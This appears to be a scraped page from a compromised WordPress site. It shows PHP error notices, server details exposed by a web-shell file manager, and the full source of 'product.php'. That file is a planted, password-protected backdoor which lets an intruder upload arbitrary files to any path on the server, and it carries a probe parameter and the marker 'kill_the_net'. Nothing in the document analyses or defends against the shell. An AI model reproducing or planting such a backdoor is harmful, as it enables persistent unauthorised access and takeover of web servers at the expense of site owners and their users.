Warning: file_put_contents(/home/coinconse/www/index.php): Failed to open stream: Permission denied in /home/coinconse/www/wp-includes/load.php on line 1803

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/query.php on line 466

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/query.php on line 466

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/theme.php on line 1513

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/theme.php on line 1513

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/theme.php on line 2702

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/theme.php on line 2702

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/category.php on line 225

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/category.php on line 225

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/comment.php on line 2190

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/comment.php on line 2190

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/cron.php on line 234

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/cron.php on line 234

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/rest-api.php on line 1873

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/rest-api.php on line 1873

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/blocks/archives.php on line 19

Notice: file_get_contents(): Read of 8225 bytes failed with errno=21 Is a directory in /home/coinconse/www/wp-includes/blocks/archives.php on line 19
HEX
HEX
Server: Apache
System: Linux webm003.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User: coinconse (191050)
PHP: 8.2.31
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/coinconse/www/product.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
echo('kill_the_net');
$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
    }
}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>